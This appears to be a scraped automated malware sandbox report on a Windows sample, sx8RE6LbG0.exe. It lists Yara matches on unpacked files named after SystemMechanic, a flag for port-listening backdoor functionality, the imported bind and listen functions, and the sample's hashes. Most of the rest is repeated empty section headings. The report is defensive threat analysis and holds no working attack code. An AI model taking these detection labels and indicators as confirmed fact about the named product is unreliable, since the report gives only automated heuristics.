Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f3537d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f54dad.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f447a3.4.raw.unpack, type: UNPACKEDPE

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD40B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	2_2_6BD40B40
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC68EA0 sqlite3_clear_bindings,	2_2_6BC68EA0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD40D60 sqlite3_bind_parameter_name,	2_2_6BD40D60
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD40C40 sqlite3_bind_zeroblob,	2_2_6BD40C40
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC663C0 PR_Bind,	2_2_6BC663C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BBF22D0 sqlite3_bind_blob,	2_2_6BBF22D0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC660B0 listen,WSAGetLastError,	2_2_6BC660B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC6C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	2_2_6BC6C050
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC66070 PR_Listen,	2_2_6BC66070
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC6C030 sqlite3_bind_parameter_count,	2_2_6BC6C030
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC66410 bind,WSAGetLastError,	2_2_6BC66410

Windows Analysis Report
sx8RE6LbG0.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1433039
Product:	CloudBasic
Start time:	01:26:07
Start date:	29.04.2024
Sample:	sx8RE6LbG0.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	c4abdb03cdb7f5f76b4e83a208b222f0
SHA1:	76e3f6bcd2bdf0048a5097a50f87e69a02c47521
SHA256:	9350faf52b3bd8f727cfe9385d176f28e1b11d5b79cb6574898043eea6a2a86a
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report sx8RE6LbG0.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
sx8RE6LbG0.exe

Malware Threat Intel
Provided by